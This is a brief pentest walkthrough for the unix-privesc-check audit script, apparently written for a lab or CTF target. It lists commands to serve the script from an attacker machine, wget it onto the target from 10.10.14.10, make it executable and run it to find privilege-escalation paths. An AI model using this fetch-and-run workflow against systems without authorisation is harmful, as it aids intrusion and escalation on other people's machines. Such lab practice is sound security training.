Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps

http://pentestmonkey.net/tools/audit/unix-privesc-check

https://github.com/pentestmonkey/unix-privesc-check

Execute

1. Download the file into Kali/Parrot

2. Extract the files from .tar.gz

  • tar -xzvf unix-privesc-check-1.4.tar.gz

3. Access the folder

  • cd unix-privesc-check-1.4
  • ls

4. Start python web server to download the file into the target machine

  • python -m SimpleHTTPServer 9999

5. Download the file into the target machine

  • wget http://10.10.14.10:9999/unix-privesc-check
  • ls

6. Make the script executable

  • ls -l
  • chmod 777 unix-privesc-check
  • ls -l

7. Run the script

  • ./unix-privesc-check detailed

Analyze the output and get what is needed for a privilege escalation attempt.